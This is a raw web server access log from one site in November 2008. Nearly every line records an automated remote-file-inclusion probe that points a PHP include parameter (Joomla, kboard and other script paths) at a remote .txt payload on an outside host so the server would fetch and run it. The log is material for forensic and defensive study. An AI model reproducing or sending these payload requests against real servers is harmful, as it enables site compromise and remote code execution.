66.40.52.30 - - [02/Nov/2008:21:16:39 -0800] "GET /logs/access.log/?sourcedir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:21:21:41 -0800] "GET /?sIncPath=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:21:21:42 -0800] "GET /logs/access_080825.log/?sIncPath=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:21:21:46 -0800] "GET /logs/?sIncPath=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 200 2368 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:21:22:49 -0800] "GET /logs/access_080825.log/?sIncPath=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:21:22:50 -0800] "GET /?sIncPath=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:21:22:52 -0800] "GET /logs/?sIncPath=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 2368 "-" "libwww-perl/5.810" "www.vspeaking.com"
208.80.194.32 - - [02/Nov/2008:21:23:18 -0800] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.1)" "vspeaking.com"
216.139.67.116 - - [02/Nov/2008:21:23:31 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
216.139.67.116 - - [02/Nov/2008:21:23:31 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
216.139.67.116 - - [02/Nov/2008:21:24:52 -0800] "GET /logs/scripts.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
216.139.67.116 - - [02/Nov/2008:21:24:54 -0800] "GET /logs/access_080804.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
88.84.145.169 - - [02/Nov/2008:21:25:09 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
88.84.145.169 - - [02/Nov/2008:21:25:09 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
80.93.57.207 - - [02/Nov/2008:21:27:59 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
69.72.144.18 - - [02/Nov/2008:21:29:25 -0800] "GET /tiny_includes/config.php?dir_ws=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
69.72.144.18 - - [02/Nov/2008:21:29:30 -0800] "GET /logs//tiny_includes/config.php?dir_ws=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
69.72.144.18 - - [02/Nov/2008:21:29:55 -0800] "GET /logs/access.log//tiny_includes/config.php?dir_ws=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
80.93.57.207 - - [02/Nov/2008:21:30:29 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.93.57.207 - - [02/Nov/2008:21:30:30 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.93.57.207 - - [02/Nov/2008:21:30:30 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
69.72.144.18 - - [02/Nov/2008:21:31:05 -0800] "GET /logs/access_080818.log//tiny_includes/config.php?dir_ws=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
69.72.144.18 - - [02/Nov/2008:21:38:18 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
69.72.144.18 - - [02/Nov/2008:21:38:18 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
69.72.144.18 - - [02/Nov/2008:21:38:18 -0800] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:21:39:49 -0800] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:21:39:49 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:21:39:50 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
69.72.144.18 - - [02/Nov/2008:21:40:08 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
69.72.144.18 - - [02/Nov/2008:21:40:08 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
69.72.144.18 - - [02/Nov/2008:21:40:08 -0800] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:21:40:17 -0800] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:21:40:17 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:21:40:18 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:21:40:25 -0800] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:21:40:25 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:21:40:26 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
202.144.158.163 - - [02/Nov/2008:21:46:00 -0800] "GET /?sourcedir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
202.144.158.163 - - [02/Nov/2008:21:46:00 -0800] "GET /logs/?sourcedir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 200 2368 "-" "libwww-perl/5.805" "www.vspeaking.com"
202.144.158.163 - - [02/Nov/2008:21:46:00 -0800] "GET /logs/access.log/?sourcedir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
67.18.151.242 - - [02/Nov/2008:21:53:28 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://webesek.hu//bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
67.18.151.242 - - [02/Nov/2008:21:53:28 -0800] "GET /logs///mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://webesek.hu//bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
121.124.127.40 - - [02/Nov/2008:22:03:42 -0800] "GET /logs/access.log//tiny_includes/config.php?dir_ws=http://replicadisks.ru/components/com_xmap/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [02/Nov/2008:22:04:35 -0800] "GET /logs/access.log//tiny_includes/config.php?dir_ws=http://replicadisks.ru/components/com_xmap/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [02/Nov/2008:22:06:27 -0800] "GET /logs/access.log%20%20//tiny_includes/config.php?dir_ws=http://replicadisks.ru/components/com_xmap/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [02/Nov/2008:22:07:05 -0800] "GET /logs/access.log//tiny_includes/config.php?dir_ws=http://replicadisks.ru/components/com_xmap/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [02/Nov/2008:22:09:38 -0800] "GET /logs/access.log//tiny_includes/config.php?dir_ws=http://replicadisks.ru/components/com_xmap/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
67.205.7.217 - - [02/Nov/2008:22:14:01 -0800] "GET /components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
67.205.7.217 - - [02/Nov/2008:22:14:01 -0800] "GET /components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
67.205.7.217 - - [02/Nov/2008:22:14:01 -0800] "GET /components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
67.205.7.217 - - [02/Nov/2008:22:14:01 -0800] "GET /components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.140.135.93 - - [02/Nov/2008:22:15:09 -0800] "GET /rgboard/?site_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
200.140.135.93 - - [02/Nov/2008:22:15:09 -0800] "GET /logs//rgboard/?site_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:22:24:09 -0800] "GET /logs/access_080804.log//content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:22:24:09 -0800] "GET /content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:22:24:10 -0800] "GET /logs//content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
200.140.135.93 - - [02/Nov/2008:22:25:03 -0800] "GET /logs/access.log//rgboard/?site_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:22:25:58 -0800] "GET /logs/access.log//content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
198.65.247.14 - - [02/Nov/2008:22:43:10 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.vspeaking.com"
198.65.247.14 - - [02/Nov/2008:22:43:10 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.vspeaking.com"
198.65.247.14 - - [02/Nov/2008:22:43:10 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.vspeaking.com"
216.139.67.116 - - [02/Nov/2008:22:44:24 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
216.139.67.116 - - [02/Nov/2008:22:44:24 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
216.139.67.116 - - [02/Nov/2008:22:44:24 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
69.72.144.18 - - [02/Nov/2008:22:44:36 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://geocities.com/ronikoe/z6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
69.72.144.18 - - [02/Nov/2008:22:44:36 -0800] "GET /logs//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://geocities.com/ronikoe/z6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
69.72.144.18 - - [02/Nov/2008:22:44:36 -0800] "GET /kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://geocities.com/ronikoe/z6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
198.173.255.20 - - [02/Nov/2008:22:48:00 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
198.173.255.20 - - [02/Nov/2008:22:48:00 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
198.173.255.20 - - [02/Nov/2008:22:48:01 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:22:48:21 -0800] "GET /logs/access.log//errors.php?error=http://www.gardhenal.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:22:48:21 -0800] "GET /errors.php?error=http://www.gardhenal.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:22:48:21 -0800] "GET /logs//errors.php?error=http://www.gardhenal.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
121.124.127.40 - - [02/Nov/2008:22:48:30 -0800] "GET /logs/access.log//tiny_includes/config.php?dir_ws=http://replicadisks.ru/components/com_xmap/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [02/Nov/2008:22:48:36 -0800] "GET /logs/access.log//tiny_includes/config.php?dir_ws=http://replicadisks.ru/components/com_xmap/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:22:49:28 -0800] "GET /logs/access_080915.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:22:49:29 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:22:49:29 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [02/Nov/2008:22:50:08 -0800] "GET /logs/access.log%20%20//tiny_includes/config.php?dir_ws=http://replicadisks.ru/components/com_xmap/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:22:50:35 -0800] "GET /logs/access_080915.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:22:50:35 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:22:50:35 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:22:51:02 -0800] "GET /logs/access_080915.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:22:51:02 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:22:51:02 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [02/Nov/2008:22:51:29 -0800] "GET /logs/access.log//tiny_includes/config.php?dir_ws=http://replicadisks.ru/components/com_xmap/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
198.65.247.14 - - [02/Nov/2008:22:53:11 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.vspeaking.com"
198.65.247.14 - - [02/Nov/2008:22:53:11 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.vspeaking.com"
198.65.247.14 - - [02/Nov/2008:22:53:11 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.vspeaking.com"
74.6.22.106 - - [02/Nov/2008:22:53:35 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:22:54:17 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:22:54:17 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:22:54:17 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.86.110.83 - - [02/Nov/2008:22:55:55 -0800] "GET /logs/access.log//errors.php?error=http://www.gardhenal.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
88.86.110.83 - - [02/Nov/2008:22:55:55 -0800] "GET /errors.php?error=http://www.gardhenal.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
88.86.110.83 - - [02/Nov/2008:22:55:55 -0800] "GET /logs//errors.php?error=http://www.gardhenal.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
219.85.63.226 - - [02/Nov/2008:22:58:02 -0800] "GET /logs/access.log///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [02/Nov/2008:22:58:06 -0800] "GET /logs///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [02/Nov/2008:22:58:06 -0800] "GET //include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
62.141.48.87 - - [02/Nov/2008:22:58:42 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bodez.us/template/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
